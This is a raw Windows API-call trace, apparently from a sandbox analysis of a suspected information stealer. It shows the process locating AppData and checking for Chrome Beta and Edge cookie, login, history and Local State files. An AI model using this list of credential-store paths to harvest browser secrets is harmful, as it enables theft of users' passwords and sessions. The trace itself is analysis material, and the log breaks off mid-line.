[0180.390] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f3f0 [0180.391] lstrcpyA (in: lpString1=0x61f3f0, lpString2="" | out: lpString1="") returned="" [0180.391] GetProcessHeap () returned 0x5f0000 [0180.391] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x23) returned 0x6139e0 [0180.391] GetProcessHeap () returned 0x5f0000 [0180.391] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f400 [0180.391] ResetEvent (hEvent=0xc) returned 1 [0180.391] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0 [0180.415] GetProcessHeap () returned 0x5f0000 [0180.415] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f400 | out: hHeap=0x5f0000) returned 1 [0180.415] GetProcessHeap () returned 0x5f0000 [0180.415] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6139e0 | out: hHeap=0x5f0000) returned 1 [0180.415] GetProcessHeap () returned 0x5f0000 [0180.415] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3f0 | out: hHeap=0x5f0000) returned 1 [0180.415] GetProcessHeap () returned 0x5f0000 [0180.416] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f2e0 | out: hHeap=0x5f0000) returned 1 [0180.416] GetProcessHeap () returned 0x5f0000 [0180.416] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.416] GetProcessHeap () returned 0x5f0000 [0180.416] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.416] GetProcessHeap () returned 0x5f0000 [0180.416] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f320 | out: hHeap=0x5f0000) returned 1 [0180.416] GetProcessHeap () returned 0x5f0000 [0180.416] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3e0 | out: hHeap=0x5f0000) returned 1 [0180.416] GetProcessHeap () returned 0x5f0000 [0180.416] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f2a0 | out: hHeap=0x5f0000) returned 1 [0180.416] GetProcessHeap () returned 0x5f0000 [0180.416] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f290 | out: hHeap=0x5f0000) returned 1 [0180.416] lstrlenA (lpString=0x0) returned 0 [0180.416] GetProcessHeap () returned 0x5f0000 [0180.416] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f2e0 [0180.416] GetProcessHeap () returned 0x5f0000 [0180.416] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f2f0 [0180.416] GetProcessHeap () returned 0x5f0000 [0180.416] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f3a0 [0180.416] GetProcessHeap () returned 0x5f0000 [0180.416] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615ea0 [0180.417] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.417] GetProcessHeap () returned 0x5f0000 [0180.417] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x5f0000) returned 1 [0180.417] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5ce830, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.417] GetProcessHeap () returned 0x5f0000 [0180.417] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f300 [0180.417] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.417] GetProcessHeap () returned 0x5f0000 [0180.417] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.417] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.417] GetProcessHeap () returned 0x5f0000 [0180.417] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613440 [0180.417] GetProcessHeap () returned 0x5f0000 [0180.417] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613440, Size=0x93) returned 0x611f60 [0180.417] GetProcessHeap () returned 0x5f0000 [0180.417] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4a) returned 0x620320 [0180.417] GetProcessHeap () returned 0x5f0000 [0180.417] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620320, Size=0xa1) returned 0x624900 [0180.418] GetProcessHeap () returned 0x5f0000 [0180.418] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x51) returned 0x618290 [0180.418] GetProcessHeap () returned 0x5f0000 [0180.418] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x618290, Size=0xa9) returned 0x6249c0 [0180.418] GetProcessHeap () returned 0x5f0000 [0180.418] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f3a0, Size=0x55) returned 0x618a10 [0180.418] GetProcessHeap () returned 0x5f0000 [0180.418] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6249c0 | out: hHeap=0x5f0000) returned 1 [0180.418] GetProcessHeap () returned 0x5f0000 [0180.418] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624900 | out: hHeap=0x5f0000) returned 1 [0180.418] GetProcessHeap () returned 0x5f0000 [0180.418] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.418] GetProcessHeap () returned 0x5f0000 [0180.418] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.418] GetProcessHeap () returned 0x5f0000 [0180.418] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f300 | out: hHeap=0x5f0000) returned 1 [0180.418] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.418] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\Cookies.bak") returned 0 [0180.419] GetProcessHeap () returned 0x5f0000 [0180.419] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618a10 | out: hHeap=0x5f0000) returned 1 [0180.419] GetProcessHeap () returned 0x5f0000 [0180.419] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f2f0 | out: hHeap=0x5f0000) returned 1 [0180.419] GetProcessHeap () returned 0x5f0000 [0180.419] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f2e0 | out: hHeap=0x5f0000) returned 1 [0180.419] GetProcessHeap () returned 0x5f0000 [0180.420] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f2f0 [0180.420] GetProcessHeap () returned 0x5f0000 [0180.420] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615ea0 [0180.420] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.420] GetProcessHeap () returned 0x5f0000 [0180.420] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x5f0000) returned 1 [0180.420] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.420] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.420] GetProcessHeap () returned 0x5f0000 [0180.420] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.420] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.420] GetProcessHeap () returned 0x5f0000 [0180.420] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x27) returned 0x613440 [0180.420] GetProcessHeap () returned 0x5f0000 [0180.420] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613b90 [0180.420] GetProcessHeap () returned 0x5f0000 [0180.420] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613b90, Size=0x93) returned 0x611f60 [0180.420] GetProcessHeap () returned 0x5f0000 [0180.420] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4a) returned 0x6200f0 [0180.420] GetProcessHeap () returned 0x5f0000 [0180.420] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6200f0, Size=0xa7) returned 0x624900 [0180.420] GetProcessHeap () returned 0x5f0000 [0180.420] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x54) returned 0x618110 [0180.420] GetProcessHeap () returned 0x5f0000 [0180.420] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624900 | out: hHeap=0x5f0000) returned 1 [0180.420] GetProcessHeap () returned 0x5f0000 [0180.420] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.421] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.421] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\Login Data") returned 0 [0180.421] GetProcessHeap () returned 0x5f0000 [0180.421] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.421] GetProcessHeap () returned 0x5f0000 [0180.421] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618110 | out: hHeap=0x5f0000) returned 1 [0180.421] GetProcessHeap () returned 0x5f0000 [0180.421] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f3a0 [0180.421] GetProcessHeap () returned 0x5f0000 [0180.421] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615ea0 [0180.421] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.421] GetProcessHeap () returned 0x5f0000 [0180.421] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x5f0000) returned 1 [0180.421] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.421] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.421] GetProcessHeap () returned 0x5f0000 [0180.421] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.421] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.421] GetProcessHeap () returned 0x5f0000 [0180.421] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x27) returned 0x613440 [0180.421] GetProcessHeap () returned 0x5f0000 [0180.421] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613a40 [0180.421] GetProcessHeap () returned 0x5f0000 [0180.421] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613a40, Size=0x93) returned 0x611f60 [0180.422] GetProcessHeap () returned 0x5f0000 [0180.422] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4a) returned 0x6200f0 [0180.422] GetProcessHeap () returned 0x5f0000 [0180.422] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6200f0, Size=0xa1) returned 0x624900 [0180.422] GetProcessHeap () returned 0x5f0000 [0180.422] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x51) returned 0x618590 [0180.422] GetProcessHeap () returned 0x5f0000 [0180.422] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624900 | out: hHeap=0x5f0000) returned 1 [0180.422] GetProcessHeap () returned 0x5f0000 [0180.422] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.422] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.422] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\History") returned 0 [0180.422] GetProcessHeap () returned 0x5f0000 [0180.422] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.422] GetProcessHeap () returned 0x5f0000 [0180.422] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618590 | out: hHeap=0x5f0000) returned 1 [0180.422] GetProcessHeap () returned 0x5f0000 [0180.422] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f460 [0180.422] GetProcessHeap () returned 0x5f0000 [0180.422] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615f60 [0180.422] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.422] GetProcessHeap () returned 0x5f0000 [0180.422] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0180.422] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.422] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.422] GetProcessHeap () returned 0x5f0000 [0180.423] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.423] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.423] GetProcessHeap () returned 0x5f0000 [0180.423] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x27) returned 0x613440 [0180.423] GetProcessHeap () returned 0x5f0000 [0180.423] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613890 [0180.423] GetProcessHeap () returned 0x5f0000 [0180.423] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613890, Size=0x93) returned 0x611f60 [0180.423] GetProcessHeap () returned 0x5f0000 [0180.423] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4a) returned 0x6205a0 [0180.423] GetProcessHeap () returned 0x5f0000 [0180.423] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6205a0, Size=0xa3) returned 0x624900 [0180.423] GetProcessHeap () returned 0x5f0000 [0180.423] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x52) returned 0x618170 [0180.423] GetProcessHeap () returned 0x5f0000 [0180.423] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624900 | out: hHeap=0x5f0000) returned 1 [0180.423] GetProcessHeap () returned 0x5f0000 [0180.423] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.423] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.423] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\Web Data") returned 0 [0180.423] GetProcessHeap () returned 0x5f0000 [0180.423] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.423] GetProcessHeap () returned 0x5f0000 [0180.423] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618170 | out: hHeap=0x5f0000) returned 1 [0180.423] GetProcessHeap () returned 0x5f0000 [0180.423] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f2a0 [0180.423] GetProcessHeap () returned 0x5f0000 [0180.423] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615dc0 [0180.424] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.424] GetProcessHeap () returned 0x5f0000 [0180.424] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615dc0 | out: hHeap=0x5f0000) returned 1 [0180.424] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.424] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.424] GetProcessHeap () returned 0x5f0000 [0180.424] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.424] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.424] GetProcessHeap () returned 0x5f0000 [0180.424] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x27) returned 0x613440 [0180.424] GetProcessHeap () returned 0x5f0000 [0180.424] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613a70 [0180.424] GetProcessHeap () returned 0x5f0000 [0180.424] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613a70, Size=0x93) returned 0x611f60 [0180.424] GetProcessHeap () returned 0x5f0000 [0180.424] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4a) returned 0x6205a0 [0180.424] GetProcessHeap () returned 0x5f0000 [0180.424] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6205a0, Size=0xaf) returned 0x624900 [0180.424] GetProcessHeap () returned 0x5f0000 [0180.424] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x58) returned 0x618050 [0180.424] GetProcessHeap () returned 0x5f0000 [0180.424] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624900 | out: hHeap=0x5f0000) returned 1 [0180.424] GetProcessHeap () returned 0x5f0000 [0180.424] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.424] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.424] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\..\\Local State") returned 0 [0180.425] GetProcessHeap () returned 0x5f0000 [0180.425] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.425] GetProcessHeap () returned 0x5f0000 [0180.425] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618050 | out: hHeap=0x5f0000) returned 1 [0180.425] GetProcessHeap () returned 0x5f0000 [0180.425] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f370 [0180.425] GetProcessHeap () returned 0x5f0000 [0180.425] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615f60 [0180.425] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.425] GetProcessHeap () returned 0x5f0000 [0180.425] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0180.425] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.425] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.425] GetProcessHeap () returned 0x5f0000 [0180.425] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613440 [0180.425] lstrcpyA (in: lpString1=0x613440, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.425] GetProcessHeap () returned 0x5f0000 [0180.425] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x27) returned 0x613320 [0180.425] GetProcessHeap () returned 0x5f0000 [0180.425] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613740 [0180.425] GetProcessHeap () returned 0x5f0000 [0180.425] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613740, Size=0x93) returned 0x611f60 [0180.425] GetProcessHeap () returned 0x5f0000 [0180.425] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4a) returned 0x620320 [0180.425] GetProcessHeap () returned 0x5f0000 [0180.425] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620320, Size=0xa1) returned 0x624900 [0180.425] GetProcessHeap () returned 0x5f0000 [0180.425] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613440, Size=0x51) returned 0x6182f0 [0180.425] GetProcessHeap () returned 0x5f0000 [0180.425] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624900 | out: hHeap=0x5f0000) returned 1 [0180.426] GetProcessHeap () returned 0x5f0000 [0180.426] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.426] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.426] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\Cookies") returned 0 [0180.426] GetProcessHeap () returned 0x5f0000 [0180.426] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.426] GetProcessHeap () returned 0x5f0000 [0180.426] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6182f0 | out: hHeap=0x5f0000) returned 1 [0180.426] GetProcessHeap () returned 0x5f0000 [0180.426] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6247e0 | out: hHeap=0x5f0000) returned 1 [0180.426] GetProcessHeap () returned 0x5f0000 [0180.426] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f380 [0180.426] GetProcessHeap () returned 0x5f0000 [0180.426] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615f60 [0180.426] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.426] GetProcessHeap () returned 0x5f0000 [0180.426] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0180.426] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.426] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.426] GetProcessHeap () returned 0x5f0000 [0180.426] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.426] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.426] GetProcessHeap () returned 0x5f0000 [0180.426] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x23) returned 0x613440 [0180.426] GetProcessHeap () returned 0x5f0000 [0180.426] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613770 [0180.427] GetProcessHeap () returned 0x5f0000 [0180.427] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613770, Size=0x8b) returned 0x61c1f0 [0180.427] GetProcessHeap () returned 0x5f0000 [0180.427] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x46) returned 0x6205f0 [0180.427] GetProcessHeap () returned 0x5f0000 [0180.427] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6205f0, Size=0x9f) returned 0x611f60 [0180.427] GetProcessHeap () returned 0x5f0000 [0180.427] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x50) returned 0x620280 [0180.427] GetProcessHeap () returned 0x5f0000 [0180.427] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.427] GetProcessHeap () returned 0x5f0000 [0180.427] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c1f0 | out: hHeap=0x5f0000) returned 1 [0180.427] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.427] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data") returned 0 [0180.427] GetProcessHeap () returned 0x5f0000 [0180.427] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.427] GetProcessHeap () returned 0x5f0000 [0180.427] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620280 | out: hHeap=0x5f0000) returned 1 [0180.427] GetProcessHeap () returned 0x5f0000 [0180.427] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f2c0 [0180.427] GetProcessHeap () returned 0x5f0000 [0180.427] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615f60 [0180.427] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.428] GetProcessHeap () returned 0x5f0000 [0180.428] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0180.428] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.428] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.428] GetProcessHeap () returned 0x5f0000 [0180.428] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.428] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.428] GetProcessHeap () returned 0x5f0000 [0180.428] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x23) returned 0x613440 [0180.428] GetProcessHeap () returned 0x5f0000 [0180.428] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613b60 [0180.428] GetProcessHeap () returned 0x5f0000 [0180.428] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613b60, Size=0x8b) returned 0x61c790 [0180.428] GetProcessHeap () returned 0x5f0000 [0180.428] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x46) returned 0x620050 [0180.428] GetProcessHeap () returned 